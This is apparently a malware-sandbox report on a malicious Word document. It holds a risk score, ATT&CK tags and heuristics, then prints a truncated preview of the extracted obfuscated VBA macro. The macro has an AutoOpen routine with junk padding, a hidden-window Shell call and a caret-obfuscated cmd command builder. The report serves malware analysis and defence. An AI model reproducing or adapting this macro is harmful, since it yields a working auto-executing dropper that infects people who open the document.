MALICIOUS
82
Risk Score
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
T1566.001 Spearphishing Attachment
The sample is a malicious Office document containing a legacy WordBasic AutoOpen macro, which is a strong indicator of malicious intent. The VBA code is heavily obfuscated and truncated, preventing a full analysis of its actions. However, the presence of AutoOpen and the large size of the macro suggest it is designed to download and execute a second-stage payload. The document itself contains no meaningful text, further supporting its role as a malicious container.
Heuristics 4
-
VBA macros detected medium 1 related finding OLE_VBA_MACROSDocument contains VBA macro code
-
AutoOpen macro high OLE_VBA_AUTOOPENAutoOpen macro
-
Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXECOLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
-
Embedded URL info EMBEDDED_URLOne or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 13115 bytes |
SHA-256: 788ac93a671069e2d4e50520b62e5dc3f26144c63d43d7c34d2c74534487cdd3 |
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "NkisnaNEkr"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Sub AutoOpen()
Const RmfdwItl = 0
Dim bJOGzU(2)
bJOGzU(0) = Mid(BjDqshO, 960, 183) + Right(upojdG, 548) + Left(rHzIXo, 471) + Right(upojdG, 548)
bJOGzU(1) = MidB(SBJSQvm, 477, 689) + Right(upojdG, 548)
Dim mZfpN(5)
mZfpN(0) = MidB(SBJSQvm, 477, 689) + MidB(SBJSQvm, 477, 689)
mZfpN(1) = MidB(SBJSQvm, 477, 689) + MidB(SBJSQvm, 477, 689) + Right(upojdG, 548) + Right(upojdG, 548)
mZfpN(2) = Right(upojdG, 548) + Mid(BjDqshO, 960, 183)
mZfpN(3) = MidB(SBJSQvm, 477, 689) + Mid(BjDqshO, 960, 183) + Left(rHzIXo, 471) + Left(rHzIXo, 471)
mZfpN(4) = Right(upojdG, 548) + Right(upojdG, 548)
Dim mfdEAf(2)
mfdEAf(0) = MidB(SBJSQvm, 477, 689) + MidB(SBJSQvm, 477, 689)
mfdEAf(1) = MidB(SBJSQvm, 477, 689) + MidB(SBJSQvm, 477, 689) + MidB(SBJSQvm, 477, 689) + Mid(BjDqshO, 960, 183)
Dim kFzOfW(3)
kFzOfW(0) = Right(upojdG, 548) + MidB(SBJSQvm, 477, 689)
kFzOfW(1) = Left(rHzIXo, 471) + MidB(SBJSQvm, 477, 689) + Mid(BjDqshO, 960, 183) + Right(upojdG, 548)
kFzOfW(2) = Left(rHzIXo, 471) + Right(upojdG, 548)
Dim blATvn(4)
blATvn(0) = Right(upojdG, 548) + MidB(SBJSQvm, 477, 689)
blATvn(1) = Mid(BjDqshO, 960, 183) + Left(rHzIXo, 471)
blATvn(2) = Right(upojdG, 548) + MidB(SBJSQvm, 477, 689) + MidB(SBJSQvm, 477, 689) + Left(rHzIXo, 471)
blATvn(3) = Left(rHzIXo, 471) + Left(rHzIXo, 471) + MidB(SBJSQvm, 477, 689) + Mid(BjDqshO, 960, 183)
Dim NWSrzw(4)
NWSrzw(0) = Left(rHzIXo, 471) + Mid(BjDqshO, 960, 183)
NWSrzw(1) = Mid(BjDqshO, 960, 183) + Mid(BjDqshO, 960, 183)
NWSrzw(2) = Right(upojdG, 548) + Right(upojdG, 548) + Right(upojdG, 548) + Right(upojdG, 548)
NWSrzw(3) = MidB(SBJSQvm, 477, 689) + Mid(BjDqshO, 960, 183) + Right(upojdG, 548) + MidB(SBJSQvm, 477, 689)
Shell@ iwjjmGmtQq + KvUpDkqi + hYtitCqzuFHOc + VLLofJwisjPMv, RmfdwItl
Dim qutEJd(3)
qutEJd(0) = MidB(SBJSQvm, 477, 689) + Left(rHzIXo, 471) + Right(upojdG, 548) + Right(upojdG, 548)
qutEJd(1) = Right(upojdG, 548) + MidB(SBJSQvm, 477, 689) + MidB(SBJSQvm, 477, 689) + Mid(BjDqshO, 960, 183)
qutEJd(2) = Left(rHzIXo, 471) + Right(upojdG, 548) + Right(upojdG, 548) + MidB(SBJSQvm, 477, 689)
Dim nHilqA(2)
nHilqA(0) = Left(rHzIXo, 471) + Right(upojdG, 548) + MidB(SBJSQvm, 477, 689) + Mid(BjDqshO, 960, 183)
nHilqA(1) = MidB(SBJSQvm, 477, 689) + Left(rHzIXo, 471) + MidB(SBJSQvm, 477, 689) + Right(upojdG, 548)
Dim scnFG(2)
scnFG(0) = MidB(SBJSQvm, 477, 689) + Left(rHzIXo, 471) + Right(upojdG, 548) + Right(upojdG, 548)
scnFG(1) = MidB(SBJSQvm, 477, 689) + Right(upojdG, 548) + Right(upojdG, 548) + Mid(BjDqshO, 960, 183)
Dim wdKawz(5)
wdKawz(0) = Mid(BjDqshO, 960, 183) + Left(rHzIXo, 471)
wdKawz(1) = Mid(BjDqshO, 960, 183) + Right(upojdG, 548)
wdKawz(2) = Left(rHzIXo, 471) + MidB(SBJSQvm, 477, 689) + Right(upojdG, 548) + MidB(SBJSQvm, 477, 689)
wdKawz(3) = MidB(SBJSQvm, 477, 689) + Left(rHzIXo, 471)
wdKawz(4) = MidB(SBJSQvm, 477, 689) + Mid(BjDqshO, 960, 183) + MidB(SBJSQvm, 477, 689) + Mid(BjDqshO, 960, 183)
Dim XzpNz(3)
XzpNz(0) = Right(upojdG, 548) + Right(upojdG, 548) + MidB(SBJSQvm, 477, 689) + MidB(SBJSQvm, 477, 689)
XzpNz(1) = Left(rHzIXo, 471) + Left(rHzIXo, 471) + Mid(BjDqshO, 960, 183) + Mid(BjDqshO, 960, 183)
XzpNz(2) = Right(upojdG, 548) + Mid(BjDqshO, 960, 183)
End Sub
Attribute VB_Name = "zpWvTLs"
Function iwjjmGmtQq()
Dim ivHpUA(3)
ivHpUA(0) = MidB(SBJSQvm, 477, 689) + Left(rHzIXo, 471) + Left(rHzIXo, 471) + Mid(BjDqshO, 960, 183)
ivHpUA(1) = MidB(SBJSQvm, 477, 689) + Right(upojdG, 548)
ivHpUA(2) = Left(rHzIXo, 471) + Left(rHzIXo, 471) + Left(rHzIXo, 471) + Mid(BjDqshO, 960, 183)
zkqsRmv = CStr(Chr(CleanString(1 + 11 + 15 + 7 + 65))) + "md /" + "V/" + CStr(Chr(CleanString(1 + 7 + 10 + 5 + 44))) + CStr(Chr(CleanString(0 + 3 + 5 + 2 + 24))) + "^" + "s^e^t ^S^sm" + "=^ " + "^ ^ ^" + " ^ ^ ^" + " ^ " + " ^}}{^h" + CStr(C
... (truncated)
|
|||
Open this report in the interactive analyzer, or submit your own file for analysis.